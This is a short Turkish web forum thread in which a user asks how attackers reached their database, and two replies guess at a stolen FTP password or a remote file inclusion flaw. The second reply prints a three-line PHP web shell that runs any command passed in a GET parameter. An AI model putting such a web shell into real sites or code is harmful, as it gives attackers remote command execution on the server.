Zoque.Forum
»
Veritabanıma nasıl ulaşırlar?
|
| Veritabanları MySQL , MSSQL, SQL, Access, Oracle |
![]() |
|
|
LinkBack | Seçenekler |
|
|
#11 (permalink) |
|
Üyelik Tarihi: 17.06.2006
Yer: Ankara
Yaş: 19
Mesaj: 59
|
Re: Veritabanıma nasıl ulaşırlar?
Benim tahminim FTP şifrene ulaşmış olmaları. Oradaki bir config.PHP dosyana ulaşıp, oradan kök şifreyi/şifreleri alıp istedikleri yerleri değiştirmeleri fakat kök şifreyi değiştirmemeleri.
|
|
|
|
|
|
#12 (permalink) |
|
Üyelik Tarihi: 25.12.2006
Yer: İstanbul
Mesaj: 24
|
Re: Veritabanıma nasıl ulaşırlar?
Bence Uzaktan dosya çağırma(Remote file inclusion) yani GET methodunda ki parametre veya kontrol hataları ile sisteme girdiler ve yazma izni olmadığı içinde config ya da ayar dosyasından SQL bilgilerini aldılar...
örn: script.txt: Kod:
<?PHP
$cmd=$_GET["cmd"];
passthru($cmd);
?>
__________________
cbol@ love html,php,css,mysql :) |
|
|
|
Zoque'a hoşgeldiniz!